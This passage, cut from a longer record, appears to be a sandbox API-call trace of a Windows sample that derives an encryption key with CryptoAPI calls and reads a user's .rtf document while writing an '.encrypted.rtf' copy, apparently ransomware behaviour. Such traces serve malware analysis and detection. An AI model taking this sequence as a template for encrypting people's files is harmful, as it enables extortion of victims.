lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0033.448] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.449] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0033.449] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0033.449] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.449] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.449] CryptHashData (hHash=0x7c2240, pbData=0x7c7758, dwDataLen=0x100, dwFlags=0x1) returned 1 [0033.449] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.449] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0033.449] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.449] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0033.449] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.449] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.449] CryptDestroyHash (hHash=0x7c2240) returned 1 [0033.449] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\fe6emki1ftxh0mxk.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0033.449] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.449] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0033.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0033.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0033.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0033.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0033.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0033.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0033.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0033.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0033.450] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0033.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0033.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0033.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0033.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0033.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0033.450] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0033.450] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0033.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0033.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0033.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0033.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0033.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0033.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0033.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0033.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0033.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0033.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0033.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0033.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0033.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0033.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0033.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0033.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0033.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0033.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0033.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0033.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0033.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0033.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0033.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd0) returned 0x791190 [0033.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0033.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0033.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0033.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0033.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x791190 | out: hHeap=0x770000) returned 1 [0033.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0033.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0033.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0033.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0033.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0033.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0033.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0033.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0033.451] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66")) returned 0x10 [0033.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0033.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0033.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0033.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0033.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0033.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0033.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0033.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0033.452] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.encrypted.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\fe6emki1ftxh0mxk.encrypted.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0033.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0033.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0033.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0033.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0033.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0033.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0033.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0033.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0033.452] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0033.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0033.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0033.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0033.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0033.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0033.452] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0033.453] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0033.453] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0033.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0033.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0033.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0033.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0033.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0033.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0033.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0033.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0033.453] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0033.453] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0033.456] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x2790, lpOverlapped=0x0) returned 1 [0033.456] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0033.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0033.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0033.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x12790) returned 0x935008 [0033.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0033.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0033.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0033.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0033.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0033.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0033.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x12790) returned 0x9477a0 [0033.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0033.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.459] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0033.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0033.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x12790) returned 0x935008 [0033.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0033.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0033.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0033.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.459] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0033.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0033.460] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0033.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0033.460] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0033.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0033.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da258 [0033.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0033.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0033.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0033.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x12790) returned 0x935008 [0033.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1d8 [0033.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0033.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0033.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0033.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da378 [0033.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0033.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0033.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0033.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3b8 [0033.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0033.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0033.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0033.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc28 [0033.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0033.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0033.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0033.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0033.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0033.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x12790) returned 0x959f38 [0033.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0033.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0033.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0033.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0033.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0033.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0033.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0033.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0033.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0033.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0033.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0033.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0033.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0033.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0033.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0033.462] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0033.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0033.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0033.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0033.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0033.462] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0033.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0033.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0033.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0033.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0033.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0033.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0033.462] RtlAllocateHeap 